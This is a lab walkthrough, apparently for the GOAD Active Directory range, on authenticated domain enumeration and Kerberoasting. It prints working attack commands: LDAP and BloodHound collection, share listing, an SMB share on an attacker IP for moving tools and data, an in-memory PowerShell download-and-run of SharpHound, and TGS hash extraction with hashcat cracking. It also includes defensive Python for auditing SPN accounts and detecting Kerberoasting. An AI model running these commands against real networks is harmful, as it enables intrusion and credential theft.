Enumeration with a User

Domain Recon

Now that we have some valid credentials, we can really start to enumerate the target domains.

GetADUsers.py

impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople

ldapdomaindump

We can also use LDAP queries to gather information on all of the other domains thanks to the forest trust relationships. An excellent tool for this is ldapdomaindump, which exports the results in grepable, JSON and HTML formats for quick data parsing.

ldapdomaindump --user 'north.sevenkingdoms.local\brandon.stark' --password 'iseedeadpeople' 192.168.10.12 --outdir ldapdomaindump-essos

ldapdomaindump --user 'north.sevenkingdoms.local\brandon.stark' --password 'iseedeadpeople' 192.168.10 --outdir ldapdomaindump-sevenkingdoms

ldapdomaindump --user 'north.sevenkingdoms.local\brandon.stark' --password 'iseedeadpeople' 192.168.10.11 --outdir ldapdomaindump-north.sevenkingdoms
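Because ldapdomaindump writes JSON, the dump is easy to post-process. As an added example (not code from the original post or from the ldapdomaindump project), the function below reads a constructed sample in the shape I assume domain_users.json takes (a list of entries with a "dn" and an "attributes" dict whose values are lists) and reports enabled accounts that carry an SPN together with their password age, which is the list a defender wants to move to gMSAs or long rotated passwords:

```python
import json
from datetime import datetime, timezone

# Constructed sample in the assumed shape of ldapdomaindump's domain_users.json.
# Account names, SPNs and dates are made up for this example.
SAMPLE_DOMAIN_USERS = json.dumps([
    {"dn": "CN=svc_sql,CN=Users,DC=example,DC=local",
     "attributes": {"sAMAccountName": ["svc_sql"],
                    "servicePrincipalName": ["MSSQLSvc/db01.example.local:1433"],
                    "pwdLastSet": ["2019-03-04 00:00:00+00:00"],
                    "userAccountControl": [66048]}},   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    {"dn": "CN=alice,CN=Users,DC=example,DC=local",
     "attributes": {"sAMAccountName": ["alice"],
                    "pwdLastSet": ["2023-06-01 08:00:00+00:00"],
                    "userAccountControl": [512]}},     # no SPN: not reported
    {"dn": "CN=krbtgt,CN=Users,DC=example,DC=local",
     "attributes": {"sAMAccountName": ["krbtgt"],
                    "servicePrincipalName": ["kadmin/changepw"],
                    "pwdLastSet": ["2018-01-01 00:00:00+00:00"],
                    "userAccountControl": [514]}},     # disabled: not reported
])

ACCOUNTDISABLE = 0x0002  # userAccountControl bit for a disabled account


def first(attrs, name, default=None):
    """ldapdomaindump stores every attribute as a list; return its first value."""
    vals = attrs.get(name)
    return vals[0] if vals else default


def spn_accounts(domain_users_json, now=None, max_age_days=365):
    """Return enabled user accounts that carry an SPN, i.e. accounts whose
    service tickets can be requested by any domain user and cracked offline,
    with their password age so stale ones can be prioritised."""
    now = now or datetime.now(timezone.utc)
    findings = []
    for entry in json.loads(domain_users_json):
        attrs = entry["attributes"]
        spns = attrs.get("servicePrincipalName") or []
        uac = first(attrs, "userAccountControl", 0)
        name = first(attrs, "sAMAccountName", "")
        # krbtgt always has an SPN but its key is not a user-chosen password
        if not spns or uac & ACCOUNTDISABLE or name.lower() == "krbtgt":
            continue
        pwd_set = datetime.fromisoformat(first(attrs, "pwdLastSet"))
        age = (now - pwd_set).days
        findings.append({"account": name, "spns": spns,
                         "pwd_age_days": age, "stale": age > max_age_days})
    return findings
```

Point it at the real file with `spn_accounts(open("ldapdomaindump-essos/domain_users.json").read())` once you have confirmed the field shapes match your version of the tool.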


BloodHound Collection

With a credential we should always run BloodHound if possible, to help us formulate attack paths and find misconfigurations.

python bloodhound.py --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -ns 192.168.10.11

We have to change our command syntax a bit in order to enumerate the other domains: the user is given in UPN form and the target domain, DC and nameserver are switched.

python bloodhound.py --zip -c All -d essos.local -u samwell.tarly@north.sevenkingdoms.local -p Heartsbane -dc meereen.essos.local -ns 192.168.10.12
python bloodhound.py --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -ns 192.168.10.10

The brandon.stark user has RDP access to castelblack, so let's RDP in and run SharpHound.exe, as it is more robust than the Python BloodHound port.

We can spin up an SMB share on our attacker machine in order to transfer the executable over to the target machine.

impacket-smbserver share $(pwd) -username me -password me -smb2support

net use \\10.10.10.10\share /user:me me
echo F | xcopy \\10.10.10.10\share\SharpHound.exe C:\Windows\Tasks\SharpHound.exe

If we wanted to run the assembly entirely in memory instead of writing it to disk, we could do the following.

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())

Now we can run the collector for all three domains.

.\SharpHound.exe -d north.sevenkingdoms.local -c all --zipfilename winbh-north-sevenkingdoms.zip

.\SharpHound.exe -d sevenkingdoms.local -c all --zipfilename winbh-sevenkingdoms.zip

.\SharpHound.exe -d essos.local -c all --zipfilename winbh-essos.zip

Then we can push the zip files back over the same share to our attacker machine for analysis.

echo F | xcopy .\20230623045149_winbh-north-sevenkingdoms.zip \\10.10.10.10\share

We should have a ton of intel to import into BloodHound at this point!

All domains and computers
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p

All the Domain Users
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p

Map of Domains/Groups/Users
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q

ACLs for the Users
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p


Share Enumeration

With a valid account we can utilize tooling such as CrackMapExec to see which network shares that user has access to. There isn't anything juicy in the GOADv2 shares; however, during a real engagement tools like manspider and snaffler are incredibly useful for finding all sorts of sensitive files.

Share Enumeration with CME
crackmapexec smb 192.168.10.10-23 -u 'brandon.stark' -p 'iseedeadpeople' --shares


Kerberoasting

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service). Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline brute force attacks that may expose plaintext credentials. See https://attack.mitre.org/techniques/T1558/003/
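The flip side of the technique is that every service ticket request is logged by the DC as Security event 4769, and a burst of RC4 (etype 0x17) tickets for several non-machine service accounts from one principal is the classic Kerberoasting signature. As an added example (not from the original post), the detection below runs over a constructed sample of 4769 fields as a SIEM might export them; event names, IPs and the "svc_web" account are made up:

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample of Windows Security event 4769 fields (TGS request).
# Times, IPs and the svc_web account are invented for this example.
SAMPLE_4769 = [
    {"time": "2023-06-23 04:51:49", "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "jon.snow", "TicketEncryptionType": "0x17", "IpAddress": "192.168.10.50", "Status": "0x0"},
    {"time": "2023-06-23 04:51:50", "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "192.168.10.50", "Status": "0x0"},
    {"time": "2023-06-23 04:51:50", "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "192.168.10.50", "Status": "0x0"},
    # normal user: one AES ticket and one RC4 ticket for a machine account, no alert
    {"time": "2023-06-23 04:52:10", "TargetUserName": "alice@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "jon.snow", "TicketEncryptionType": "0x12", "IpAddress": "192.168.10.51", "Status": "0x0"},
    {"time": "2023-06-23 04:52:11", "TargetUserName": "alice@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "CASTELBLACK$", "TicketEncryptionType": "0x17", "IpAddress": "192.168.10.51", "Status": "0x0"},
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP


def is_rc4_service_ticket(ev):
    """True for a successful RC4 ticket for a user (not machine, not krbtgt) service account.
    Machine accounts have random 120-character passwords, so they are not crackable."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() in RC4_ETYPES
            and ev["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_alerts(events, threshold=2, window_seconds=300):
    """Group RC4 service-ticket requests by (requesting user, source IP) and alert when
    at least `threshold` distinct service accounts are requested inside one window."""
    by_src = defaultdict(list)
    for ev in events:
        if is_rc4_service_ticket(ev):
            ts = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
            by_src[(ev["TargetUserName"], ev["IpAddress"])].append((ts, ev["ServiceName"]))
    alerts = []
    for (user, ip), reqs in by_src.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window starting at each request
            names = {s for t, s in reqs[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(names) >= threshold:
                alerts.append({"user": user, "ip": ip, "services": sorted(names)})
                break
    return alerts
```

In a domain that still needs RC4 for legacy services, tune the threshold per source rather than alerting on every 0x17 ticket, and enable AES on service accounts so the etype alone becomes a strong signal.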

Kerberoasting with impacket
impacket-GetUserSPNs -request -dc-ip 192.168.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

Now we can try to crack the TGS hashes with hashcat (mode 13100 is Kerberos 5 TGS-REP etype 23).

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt

We were successful in obtaining another credential!

north.sevenkingdoms.local\jon.snow:iknownothing❗

Next: Relay Attacks